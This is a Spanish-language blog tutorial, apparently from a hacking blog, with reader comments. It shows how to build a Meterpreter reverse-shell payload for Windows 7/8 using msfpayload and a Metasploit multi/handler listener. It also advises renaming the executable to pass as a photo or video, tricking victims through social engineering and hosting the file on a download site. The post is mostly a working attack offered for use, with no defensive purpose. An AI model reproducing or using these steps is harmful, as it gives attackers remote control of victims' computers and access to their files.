Hola, en este post mostraré una de las formas de vulnerar un pc con sistema operativo Windows 8 ó 7 (básicamente son los mismo). Para esto lo haré en Backtrack desde una VMware.
A tener en consideración:
- Este es un ataque posible de realizar dentro de una red.
- También es necesario tener un poco de conocimientos básicos en ingeniería social para poder engañar a la víctima y acepte nuestro archivo (exploit).
- Más adelante mostraré un vídeo donde se aplica los códigos que expondré, en el vídeo se muestra el archivo exploit.exe como tal sin ser “encubierto”, pero si ustedes quieren crear un buen ataque, es bueno que tomen en cuenta aprender como se pueden transformar un archivo malicioso en un archivo que pase quizás como una simple foto.
- Y por ultimo, no me hago responsable por el uso de lo que pueden aprender de esto.
Lo primero que necesitamos, es saber que es un exploit. Es un programa (software), programado para aprovechar las vulnerabilidades de sistemas informáticos. Que buscamos con un exploit? que nos de acceso a archivos de la victima, que nos permita escalar privilegios en la máquina de la victima, que nos de control (total) de una pc, eso a grandes rasgos.
Bueno para crear nuestro pequeño programa ocuparemos metasploit, que se ocupa desde la terminal escribiendo “msfconsole” (sin comillas) y veremos algo así.
Ahora usaremos el siguiente comando.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 x > /root/exploit.exe
- En LHOST deben poner su ip local, la pueden ver abriendo una terminal nueva y escribiendo ifconfig.
- LPORT tiene que ser el puerto 4444 solo déjenlo así.
- /root/ es la carpeta donde quedara guardado el exploit que crearan, pueden cambiar esa ruta si desean y poner /root/Desktop/ para que el programa se guarde directamente en el escritorio.
- exploit.exe es el programa que crearemos, pero ustedes pueden poner otro nombre para que ya no sea tan sospechoso, por ejemplo /foto.exe o /video.exe o lo que les parezca conveniente.
El segundo comando a usar es:
use exploit/multi/handler
Con ese comando le damos la instrucción de que tipo de exploit usaremos.
Tercer comando:
set payload windows/meterpreter/reverse_tcp
- Con este comando, cramos el programa para windows.
- Lo programamos para que la sesión a abrir sea mediante meterpreter.
- y que sea reverse es que esperamos que la víctima no s de una respuesta para que se active el exploit.
Cuarto comando:
set lhost (tu ip, ejemplo 192.168.0.1)
Volvemos a poner la ip local, con esto al abrir el exploit la sesión será abierta en nuestra máquina. (cosa obvia)
Quinto y ultimo comando.
exploit
Esto simplemente crea el exploit con las características que ya le dimos.
Y ya tienen su exploit listo para enviárselo a alguien, una forma muy usada también es usar un servidor como 4shared y alojar su exploit ahí y luego que alguien lo baje, recuerden que siempre dentro de su red.
Bueno y dejaré el vídeo para que quede más claro aún.
saludos
hola un tutorial muy bien esplicado
ResponderBorrarlo e echo todo paso a paso pero una vez que paso el exploit a pc que tiene instalado w8 y le doy doble clip no pasa nada en mi terminal
no me sale el comando meterprete como te sale a ti en el video me lo podrias a clarar que ago mal gracias
saludos...
a mi me funciona solo con windows xp y 7 pero en maquinas virtuales, en el mio no funciona. le doy y no ocurre nada
ResponderBorrarcomo lo descargoo ???
ResponderBorrar